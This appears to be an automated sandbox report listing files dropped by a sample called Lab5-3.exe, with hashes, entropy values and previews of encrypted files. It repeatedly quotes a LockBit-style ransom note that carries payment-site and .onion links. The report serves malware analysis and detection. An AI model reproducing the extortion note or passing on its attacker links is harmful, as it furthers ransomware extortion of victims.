                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2720
                                                                                                          Entropy (8bit):7.935913236118359
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lOO+6uYdmYoy51vxvr5FKvB6HfUTid3hBaUoSGFcmeykEdEElU92i:lxjdXPvv+Gx0uKeY2ElUJ
                                                                                                          MD5:B258BCE119675026E5515A7768446682
                                                                                                          SHA1:153D717C65A1508334ABEF0E06038498BF8102C9
                                                                                                          SHA-256:511FBAA33AEE12E8BB3299676F3011E782BBACB1C172C531AEF2A8C4BCC9225B
                                                                                                          SHA-512:E49BF98AC95407427193EA9AF87382623FC38C5616091AA988B3EB725F523A2FE9AD705E3468D26B0F406745527CB3991CA7E4DCB3E0FCAACA1F2DD71B2C9B0F
                                                                                                          Malicious:false
                                                                                                          Preview:.e.Br........STd......+.0s..b..G+X6k0..].a .)^..Z..N....L.!z....a./..V^L2.{f..C....<...p.......*../#..!..Q.@.W.F3.Hi.g.wA.U......q]..<..a.G...R2].oe..x.N0..l.E.....C.>.~....!cqx..@..eI....b.F....VA./..1..c...|'.NRK...T...14...._.UF.#.G..(. .gN.L.h.*.k.s....WtyX....+W...7...mJ.....#.....As".......h..}`H...U.Y.S0.E..........5Y..tl.G`.....pO..J.L. ...e.s.^.^../x.(.R...........o/....n......<..........(z.$h..Y.PZ...x.E./(.?`.:mV.....P.L.Y.+b..\.0.....}.....$...E.[6...h.Lt....".n.....M..i....(..CTA-..m..Na.MFq.8B.<$..M..........'.....T8.......@.z.L.|..Q....}.=Y%`.6..p."%{.t....[.j.?..%.@..J0..{.^.w\^....u6X...^P..x.=..v...|:..o.v......D.@...=...<...Lo...j:z.1..c...(..}...RV.e.E;.6. +.....Z.>....T..W_.....5|..,o.X,.Md..k .%R.@....]....F...r......6.''..?.-.gW.j.L......V.th.c.n.L....Qw`..9.I...|F.....u.U... ...D3@..s{...].7.;.x1qm......zs.-C.j'Vk.S....j...M....rPmx)...)#3........Z&.-....1[.Y.-..N.....Zy........y^{..b..V.)%....)(K.83...X..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.9282380559879675
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:YjX9/tvV89+Ed7JmIYLLVCLHzMMxWHfUTid3hBaUoSGFcmeykEdEElU92i:Klvq/JmIYXUTVxpGx0uKeY2ElUJ
                                                                                                          MD5:893AC83CBDBDA9EF77B3B0BD78FC7293
                                                                                                          SHA1:AC5A36D714A4925715070FF5C192010360B5AB56
                                                                                                          SHA-256:59D5C4DE1B718FAF739CA45B4E6557E41799D3A68DA769E205FAAA76C58F497E
                                                                                                          SHA-512:E7C2538F44960B5B4225B1B41952C2C4DF6D2524872845D335E55ED1DFB7902B828F68DED33123DD81CA5C6B7A578A580F6224FB395490ED23575AC625627BE9
                                                                                                          Malicious:false
                                                                                                          Preview:.0...r.r.k..<...F~...."......7/".....P..!.GC7.E.b.{.m.S4....N{....R)........-sG....#y..|.. ..q8.!...+.c.T.E..B..Z...Q...~..Q..%"=..<.5!...*t.h......(........GT].d.c...U6)..X))..!.%x.Z.?.!..n.2..M./.AqV.."$...........W...8ND..q......C....+.$...A....BItw..~$(.....!t.4P...ZM..9.Z.l.@f&.M.....'..h...(..F.J.sH._..>...8... .>N....$.7..Z....*....7R.Z...X.....!.@q...V...v... ..~H...T.+...\6.l>..z:h.S...e...D.<#....9.........\.b).....4.M.......^H..Q.....H...Y.o...........*.x&.E0..;...5..'Vo.O..bL....Pz$.X).8....{r.O).... .{...k.QD......A`}..l..s"..3..X!...~n2.2.k..&p......5..)'@5....z.P..v_O}.W..Rs.P..xu,.p.....3V...).P`.\....weu'...1....1..&V....@...T8+.j......[.3.z.......T...W...60...;!.....`......2B.\z..9.....v#.oZ:..m./w#.&........W....h....6..8z...a.<../.5P.duY....4...#-.]k..yd..QK..Ca....a...1..c....Z(e!..U...h.}j'..!I.k.....8.;?3..6.......3..F.B..Jn.9|....j(.mW=.,?.N.\......lM.W.8..Kb.".,.Y-^.0....e<t<.....Xd....TR..)q.?...F....3t.....z
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.927982866089276
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ju7tS8/jQ9wlBadQo3iXHqf38TA4YBqJHfUTid3hBaUoSGFcmeykEdEElU92i:jMtV/jQKe028TPYMKGx0uKeY2ElUJ
                                                                                                          MD5:33201D084F5B0F90A245EC5C1B4754F5
                                                                                                          SHA1:A197FA5CBDF0758672DAC37F0399A7955D039E27
                                                                                                          SHA-256:51BBC0ABBB1DA94A314DC18A8295CD647675182244661E136767B968AF7EBB2C
                                                                                                          SHA-512:8A9A7B3852E7922936F8A757866583BAAF123C1C66E31678937A9826EA4FD59C85FE2E615F85447881CF6F1ECA01F481323A9A3075FF4CC601F4412E10AAA960
                                                                                                          Malicious:false
                                                                                                          Preview:].......4jo.N..!...K.k..70n;.....46.?..@.k.....c..W.LoH.=`j......IO.P..px.%.........Nl}8...r...XJDXJG6.k...E.....-.y$R......;gifG..8...T8....X.f&N........[..x..`..\.s...r._..+G.....B>S.}...@T.;SSR...<e..-(.E...`.a.....<.,......{..._..I.2GWr...8....f...(..p...Y[..Pn...E...6b@..9F.5.eF.9....$....!7....e.a*.oM.4...HD~~....u.+..3.9...%.J..T9!..B.7.h......Z._.)...#<e.D.)+.q[.@.h;..L.i9._.)....0n.F...d.).W.J....WpU ...pi.....R.............LW..q.....L{G.z.F..I......j?......)...-.TP7...[...;Q..&.C...h...|.o.D4..:....E..j..A...w.o-.b...1....z.c.s...hM....S....C...z<.b..Xv...K...<..E./.......9.)-O.5.4-r...`..z...B.).5..82...]ds..B.O....JR-a.../n.|...!.G3p.m.<XQ.`w....><..r....%<.0.(8u...C`..c.s.2.B.o...)..MDP.u%X.K..L9...Y...r.?.~...jJU......P..F.L....r..x.'p...r........T...[.[7..H.t..W...uy..H.i.8..G....WY.....6.*w...k..@+...i.....Q.kW!....;.V..h.p(j^...-...!..z...c5@..,9.*..+X...WH.}+.O......8.....Vpx..(..bhd.k g'!l.......Vx.Nz.2|.{.Y@R:....+.My
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.932473116547874
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0HMepw67TWOSCNABr9xtFW5UzAJ75eYqvKjtzKED8mHfUTid3hBaUoSGFcmeykEO:Sq67nSC+Br9X05UceFKjy5Gx0uKeY2E+
                                                                                                          MD5:C0E3FA744345ACDD7CCA354D7DFB3384
                                                                                                          SHA1:4127D95D002B46AC727C06703B5AB4F3945CCFF0
                                                                                                          SHA-256:8F471208B055967BCD5FC8DB36F76AB1030DCF11EAE8C5FF277D07166EF27F27
                                                                                                          SHA-512:FA68D8C2A67872B45E6E13D81901D6C54A1B1FC1A9286B34AD9DD234300F2D2865C349AC0BAED88C183D3FB3C41340AF513F28DBFAB5A3801037E98C7A1768DE
                                                                                                          Malicious:false
                                                                                                          Preview:...}g.m.`...G...M.....h......Qb...bt.."..;?8.N>.#..i.0.^@..q..'[y.wN.<....E4...a..l..r..y4..\..lz.1....-..+.}a..........k.+?.pF..Q.N.v....!..\.M?.j..s...y{V...MO...e..&.;d..5..I...1U.(..c?.n>+..n.|U.e.$IM....Q.wv.i).GA3....!,..$.".Fx.4.>.<Mgqd..#..r.Q.HT..t.n9....G...cVu.D.x...".qe...<..}...9...`....q..s&..r.%....'U..m .M....+..w..e..s.x.q.U.......<a\I.....X...g..J.|..H....T5......r,....T.G.i....e....:.0..Y..r...y..s.y.K.W.$.........e.wg..E..6..H)....Y.C...0......[.n.(.....u.h.&.cq..-..{..*....4D.r....?...`.F...2ax^P.Q.1..&....$q..m...dgp..S...m:...c....0e...g..c...5..x.Q..bV.'.._......[*.x..V..8........Cl..*mKV< .d..;......a.u.<...V..#}...c..^..L..<...^*0..&E...h7+.]..`n..{;....H.~..u..N...z.D.P......Q|kJ..J.t"*i.U].....-#>..2N. .d[..g/.<wI.....f.h..._-C.b...S"..l.qhS..$6{.I..P..*..7.h.......@\e..6.\..Xx.......}...7..T.O$....h...W.....^$.l....V+.P.L.(.o..I....2..O....F.!J....<G.......... ....!f..Tx..s......:.<Xd?..V.5...G....:.7(...."'...8.)..8*....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2736
                                                                                                          Entropy (8bit):7.932757309474213
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:QqUneTZ2ys299L0h0oiTaAnvqKc0HfUTid3hBaUoSGFcmeykEdEElU92i:QlUZhz99L0JCvqLGx0uKeY2ElUJ
                                                                                                          MD5:5D754BC89394DB238DF138019F32399D
                                                                                                          SHA1:5B54E8FD817E46B812FB36063F87A89B0E3FBAED
                                                                                                          SHA-256:79EDBDA9BF45CC4A9A875E0EFEEB0CAF2A4AAE614D757990BE23FE4114B2D883
                                                                                                          SHA-512:01B9B0698681F067BAFB2658A9B99A9A3A764B754F0BDBF5215E0F84AB72EC2E37664AF13E66B3FF052CA152E5480DF04B996472A6A3490DB4D6A852E69EB324
                                                                                                          Malicious:false
                                                                                                          Preview:.....m..e...6.Q..5}(.<...P..{.......o.....vQ..W../(<(B.b....Qj.|...4)H...w.#....x.a#...f_.rFj...+)*.x...s#......P}...Z3%|..\....d-.kW.t..W..*...BZ..,......^e...p..R.;...Fux....1...t..9.J...-...2.<..B.`X.n.B.x.|L...&J.K..|.W.:.........>...usZ..R\...48O...I3..l.A.6.....pWF.dG.......%tWi%.0..e....[ot..AH.).R|f....0Yi... U..y%)....a....Y.1..J1D."~...F%...J:uG.j..nB@9.4..(....K..b.F.K."|....AW....r. %...1S.z.2..)fV._.E.u..dM..._..a.............l....X}.6O.....U......u........Z......d\.ZUf|..........H@..K.6.".>.....if......@.<..<5.,i...,i.....@./4).5.b.3..m...<..{.z..`gA..B....OM".F.?zOVO...uo.n.D:).!p.4.`.8F...0u..(..e.5\.!T....p......$.3...a..(...lF4..Bw.TkY..~DeE.E...:R......H...G.`>.Hb6.R.[......#..[..9...:..Bl.U.j.m.!*&l...$...|.....o#.M..U.n......%.[/.)....h.G...a.....Pu...:&&.. H"....=.....7P....2m....^....?iZm.....$....Y\]..S.W..<....V..i=..G.%.`.....:.'QN)p.5..'b.*..~?j....u.f.iH..!.(....a).u..v...,c..%:l.V..Q..@.....S/@.......3..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2720
                                                                                                          Entropy (8bit):7.927296975084111
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:A0APlvKpD/EHHspLfwVe01ncREuyMED4DrtA39DbGaHfUTid3hBaUoSGFcmeykEO:A07pwHstfwVZ/4H+NK1Gx0uKeY2ElUJ
                                                                                                          MD5:95B3EA690B80203D565F5A3A69A89035
                                                                                                          SHA1:4508BF667100CCB6C720C669AAA4D9DBE51E92AA
                                                                                                          SHA-256:488BEA81362605B2967FCB8AF3B415D58B3F805459D13298FB858C3DF2F7FCD1
                                                                                                          SHA-512:D88F21342B60F9A496441B98467E6FD8E66C22A02A707DDEE9FDC5D3E9D6CEB541BB81E046EE12E516DA8C1E78248BB127EFBADE3D99F0AF4B8F4EFCF985FFC8
                                                                                                          Malicious:false
                                                                                                          Preview:0d.i.^....xmQ.....y..}..R.{Ld3ry..TR=....C.......Q......S....(._.S......X..D.q.,..H.{.V.b..+".....4.....6....y...PJ...!.......F.........~..!.......;..QNcs..0..B..Xz.8@..j9EK.O..J.W../..$Y.3.F.#..u.......).........;.:C.X.......b.<./...S..`....Ga...S'...(...%....<.....}...m......e.O..z.c..5.I.]G@...".0b..6..B..Y...s[..pN..7...**......~.BP>.Ouv(.....bD.5.T}&/...#&.CP{..XV ..].p...M..m...n.K~.('.i.......<....@.D...5[.o"$.C...>....A^Hi..Y...{r.q.C......v8;.t5......).4u..-{.t4.....u.9=..,..2.9.%...;...:.....*.F,....}J... }...UxB...te....}..J.O.v.(.h.h.q.....4.....;.=.P...|..S...i(..B...d..]....$.....[....I.&l.0.%p....D.=.i.w....g;..V..0.^...,A.........<.2..b.m......3,.|.g.~........t.&>(.].9W.f.@Q..n.k..k..p$0.3..O.R...C.2...OQ.=....T.....*x......u/.Y..&.Cv....9..f.."...c8.zK_W5.ho.s...l.........(....e4-..%i..t....M.f&@....G+w....1Xs.?.n.*...[.[9U....X.....~..)(..X.T^...o....-.:a..u.5..........6..n.f9Z4w..9`.(..........2mC..a..6.@...|.vF.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2512
                                                                                                          Entropy (8bit):7.925400940841446
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:dPku/TwZCqfhvslbr11M+/y4AIq5HfUTid3hBaUoSGFcmeykEdEElU92i:dPk+6HfqBo+/1Lq6Gx0uKeY2ElUJ
                                                                                                          MD5:60EE56E50364DF7100875F05E4E660F8
                                                                                                          SHA1:C4076A1E963114023AFEDA22F7C08194D78FC71D
                                                                                                          SHA-256:5E21AC1FCD23FE89BFEF6F9401A077D44D5E8F00400C005D28D87524ED6D82A7
                                                                                                          SHA-512:0E59FE3A4EFD7772FA5616F4A1F6F33AABE4FCC0B250145298980F8488DE615EF3823086736BCD92EC9E40C39E4545539D92647747F2B3578085535282CF6B5F
                                                                                                          Malicious:false
                                                                                                          Preview:4(Sy..`N.d}g.=8..........i.9!.P......# ..B..U......~......GLy9."...K.*;.b...$7.9W..i..r.<.7...N.C....@..w.t+.B.w:?..Na......!.F.C|..q..p...w..F.....G(...../...uD...h.a.!.!l.Y.!..<<.pfd...k2\g.....r....3t'?.B..........v.C...K5..^.VX...i...q.}...T.;.:.f..a%$41......W.;...Xa...$k../...7w......E...<..,...x.2....e.k$F..W..p..~.u.wv.....)......xQ...".u..4...J.:'.\9=7.x.q@...]F..D.f..y2..X.|#E..j..~..k.8.O......[}....d.e).PZ....J..._....?.......S.}.~.LcOc.Q..v3........%J.un..p"~..0..g.g,.-"ZZ.0H.>..L>.N.5O.s..^N......^2|x.L0].Q.......}......j....I.'uFw....{...PH.w..%.g)IR.K.2...K#..."..P....[..c.8NJ........iS....V.We.9.....|...u.x.[..lG....a..@..7..u....M*Z....a....6 o..d*..Y>1...L..?..p.......iz./.b..".w.C.....@.J.p.!.09\-...&..a....x..Y..(..."...M!. .P...G#.!.....w.o....t..3.?...3..o.jjK_....h.....s.j..XQ.7.c.......V.....S......r..L.x}.....N.|OG.K..2.0..e.^l.9.?.i..z......Vk.F......b.VC.w4.Z{zUum.Jt.#..X. .......g}K.xL.>...I.'.,0r)c...t.9
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5472
                                                                                                          Entropy (8bit):7.968729998671679
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Hc4/rmZe3MByfASCkIIJ9x+1D3GNt/BxXc4BxqMcqSeOkuCxyGgXiXZqjGx0uKeR:txl4/kE1DKpthxqZehuCx8SpqA0Cb
                                                                                                          MD5:214CBEDD2682737D24663619623AE977
                                                                                                          SHA1:CD71FA48939295F198DAFD9A479AA7E25CEB17C1
                                                                                                          SHA-256:71D6C3F072F2735B5A60995F464E2AC95F59980CC5BEF63851FD713D390B9272
                                                                                                          SHA-512:0641E223CB235904109AEB7D577F4A661C79CB8E97D85C9EAC2DE4D4E03B1E6A944814122641BA89F4C986570F7692BBF501275D2C779E59899139CE9A246D63
                                                                                                          Malicious:false
                                                                                                          Preview:jI...P]...|.J"e.X...x=....{.......3\=.../... N.S..C.uR.H.{..k.=A.oU..91.[6:,.<G..8....qG.#M. w.x...c..Rw5...4..R..3$.MZ..8...`.......7....}Q..uZ.Q.8...R.^1.....u..CI]..@......2F.@...N.I....ET...B.&.;$...R..`y.........`...qL.~...:...~..P..t.#...r.L.V].{q..$._u.p..1..iai../O...I..X.y;..U........&`..._7_.Jl..W..L8..9.8)..,......UhB.n.X.....nj.e._...(Z.H...g$....Mm{..TR...1...{......j.T....Y........M.{....+.x:$.S.}[d....C....P..k...\.........o11).=(.z.ir..)...}<./....xF....ey.|.r. ..i...Q..}8....).{...au...<..u{k.'._............>o....K.8.....v.f..Clp..{[... ..^.D..'.m.L:..H{a.x..D.i...|.@Mm.$.....T..fl&.d&......kw.kE...srK..0...V...D..z0..P....$....../.L..]..[>G.^.%.b.;>....,....[B.:.6.`...@...im\..!.....|.P.H.d.9..F2<}......an.c.s..lj&H........~.^R.........c.......3(...q\.S.D$Rl......L.>.{....9_z:e....a.@.....U..}..P+.v.........dY.9....mW3.r..q..M.S'.....B..<+..x.wu..D...&&.$,...|...Ll.j.$.....%E.s.L...(...j,..u...OK..4{cW.........Q
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11712
                                                                                                          Entropy (8bit):7.983185314248811
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:+pnCLB8R0ARj/r5REsk93zjX3t6Za6HQ6+HUInD3p+G1EWK2Etmtl+0Cb:Z8R0ebEb93zjHtQwrHUInDfeW7dtMtb
                                                                                                          MD5:35D97B2D4F96C0490C856A2A2F87250C
                                                                                                          SHA1:D26D623F0388E0DF80C793DCA0EE045DC6C26AE9
                                                                                                          SHA-256:D53EF2D459EAFAF24B45B0D7F233456462889823DD8EB31A8042D1EFF52A38AD
                                                                                                          SHA-512:1D9C39A6624D38885205D5834BC5582E6653C806F6CF2072E6884A25AD38A1330F29077DD44384A1FE2FE836EAF65AE9A2F918FAA5CE5790B379EDD07AA53457
                                                                                                          Malicious:false
                                                                                                          Preview:k.)D.]..t..%.b..m.Z.s.d..II.q..$....\..'.xw.u.M.....sU......#..i.)...k`Ak..w.....$d.#Wj.=........(#=._.G6..^$...dh...k.c.0#..`..lz.....c....x.V1..7..^.#..s.J..M.....+a.l..1`.%..4........p.=.o{_.@..R.K...j.$.....Cx.HS...\...F.Q..>.`.....$..C'.a.|M......X.".,..-..`.G$..k.)a..o.......]<o5(......y..{.`CL.......6.15....K....M.,....9...%j.Z...s......PB....w^.6..J.h.e.r...x.(.Pm.....R.I.^.1.....3...:.y.....W$..{.......j.oy.!.nx...Xn..q.~UB.#;b.E..L..y][!.p.(?v...9M...p..Q.j.\[Y%.../{....*.p8(.S...)...m..c.">>q......V..:.o..;.._.V.<...eE.3....oX.oQ!+.Z....L...p..F.....V..-2....(F/.1.G.y..:._..?....+.$...].}:..\^. 8 E.)m.e.jC.k...,..v....<...&0Q...>?~vF{.t.Z.vo..RS%..&..l&..lb..q....g9.......f...../r.}..?`.ra.'p..Q....-...3....-...Oj.H.w...G....t.u.`P^.H..B..%............`q..Gz...Q^.I....O.k...)..*....z...k;...|.(*$.A.=. ../>Q.......4....Z.....Sw|....#....i....E5..90...{g}..-.....H9..............r....^n.....?XM.Tpy.W..|..t.[..N...../.^.uW.......|
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
